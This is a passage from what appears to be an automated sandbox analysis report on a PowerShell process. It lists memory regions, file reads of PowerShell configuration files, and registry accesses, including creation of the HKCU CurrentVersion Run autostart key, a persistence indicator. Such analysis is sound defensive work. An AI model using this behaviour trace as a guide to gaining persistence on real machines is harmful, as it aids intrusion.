private_0x0000000002080000 0x02080000 0x0211ffff Private Memory Readable, Writable True True False
sorttbls.nlp 0x02120000 0x02124fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002130000 0x02130000 0x0213ffff Private Memory Readable, Writable True True False
private_0x0000000002140000 0x02140000 0x0217ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x02180000 0x0244efff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000002450000 0x02450000 0x02842fff Pagefile Backed Memory Readable True False False
  • Region Actions
microsoft.wsman.runtime.dll 0x02850000 0x02857fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000002860000 0x02860000 0x0289ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000028a0000 0x028a0000 0x0299ffff Private Memory Readable, Writable True True False
pagefile_0x00000000029a0000 0x029a0000 0x029a0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002a30000 0x02a30000 0x02a6ffff Private Memory Readable, Writable True False False
  • Region Actions
sortkey.nlp 0x02a70000 0x02ab0fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable, Executable True True False
system.transactions.dll 0x02b30000 0x02b72fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000002b80000 0x02b80000 0x02bbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002bc0000 0x02bc0000 0x04bbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004c20000 0x04c20000 0x04c5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004ca0000 0x04ca0000 0x04cdffff Private Memory Readable, Writable True False False
  • Region Actions
system.management.automation.dll 0x04ce0000 0x04fc1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll.mui 0x04fd0000 0x0508ffff Memory Mapped File Readable, Writable False False False
  • Region Actions
powershell.exe 0x21a70000 0x21ae1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.management.automation.ni.dll 0x718d0000 0x72149fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.ni.dll 0x72150000 0x728ebfff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
mscorlib.ni.dll 0x728f0000 0x733e7fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
uxtheme.dll 0x73fd0000 0x7404ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x74190000 0x741ebfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x741f0000 0x7422efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x74260000 0x74267fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.transactions.ni.dll 0x74450000 0x744ebfff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
microsoft.wsman.management.ni.dll 0x744f0000 0x74574fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.configuration.install.ni.dll 0x74580000 0x745a4fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.management.automation.dll 0x74840000 0x74b21fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
microsoft.powershell.consolehost.ni.dll 0x74b30000 0x74bb0fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
msvcr80.dll 0x74bc0000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mscorwks.dll 0x74c60000 0x7520afff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
mscoreei.dll 0x75210000 0x75287fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
rsaenh.dll 0x75290000 0x752cafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x752d0000 0x752e5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
slc.dll 0x752f0000 0x752f9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cscapi.dll 0x75300000 0x7530afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
srvcli.dll 0x75310000 0x75328fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntshrui.dll 0x75330000 0x7539ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
linkinfo.dll 0x753a0000 0x753a8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shdocvw.dll 0x753b0000 0x753ddfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
version.dll 0x753d0000 0x753d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apphelp.dll 0x753e0000 0x7542bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x75430000 0x75450fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x75560000 0x756fdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x75700000 0x7570afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
userenv.dll 0x75710000 0x75726fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mscoree.dll 0x75730000 0x75779fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
atl.dll 0x75780000 0x75793fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x757c0000 0x7581ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75860000 0x7590bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x75910000 0x75992fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x75ba0000 0x75c9ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75ca0000 0x768e9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x768f0000 0x7697ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
devobj.dll 0x769e0000 0x769f1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
psapi.dll 0x76b30000 0x76b34fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x76b40000 0x76b49fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x76b50000 0x76beffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x76bf0000 0x76cdffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x76ce0000 0x76d6efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x76d70000 0x76db5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x76dc0000 0x76e5cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x76ee0000 0x76ef8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x76f00000 0x7700ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
setupapi.dll 0x77020000 0x771bcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x771c0000 0x77204fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x77210000 0x7736bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x77470000 0x774cffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cfgmgr32.dll 0x774d0000 0x774f6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x776e0000 0x77736fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000077860000 0x77860000 0x77959fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077960000 0x77960000 0x77a7efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77c60000 0x77ddffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
  • Region Actions
For performance reasons, the remaining 52 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (294)
+
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\syswow64\windowspowershell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\system32 type = file_attributes True 7
Fn
Get Info C:\Windows type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 2 True 1
Fn
Data
Registry (189)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Open Key HKEY_CURRENT_USER\Environment True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
